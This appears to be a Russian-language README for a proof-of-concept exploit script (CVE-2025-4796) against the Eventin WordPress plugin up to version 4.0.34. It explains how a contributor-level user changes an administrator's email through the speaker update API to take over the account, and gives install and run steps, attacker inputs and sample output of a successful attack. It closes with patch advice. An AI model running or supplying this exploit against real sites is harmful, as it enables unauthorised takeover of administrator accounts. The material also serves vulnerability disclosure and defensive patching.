
eventin <= 4.0.34 - повышение привилегий через изменение email пользователя / захват учётной записи для аутентифицированных contributor+
eventin <= 4.0.34 - повышение привилегий через изменение email пользователя / захват учетной записи для аутентифицированных участников и выше
Ошибка повышения привилегий в плагине eventin WordPress (<= 4.0.34), которая позволяет любому участнику или пользователю с более высокими правами изменять email любого пользователя через API обновления спикера плагина. Изменив email администратора на тот, который контролирует злоумышленник, он может сбросить пароль и захватить учетную запись.
eventin\speaker\api\speakercontroller::update_item)В eventin не проверяется должным образом, кто запрашивает обновление или разрешено ли изменять email пользователя. Участник или пользователь с более высокими правами может вызвать эту конечную точку:
требования:
установить requests:
pip install requests
Запустите скрипт и введите необходимые значения по запросу:
python3 CVE-2025-4796.py
[+] отключение предупреждений о проверке SSL
[+] вход в WordPress.
[+] вход выполнен успешно.
[+] получение nonce токена
[+] nonce токен найден: abcdef1234567890
[+] запрос на обновление email спикера
[+] операция обновления выполнена успешно.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
Патч выпущен в версии 4.0.35 плагина eventin. Администраторам сайтов настоятельно рекомендуется немедленно обновиться до этой версии. Исправление включает дополнительные проверки валидации пользователей в функции SpeakerController::update_item.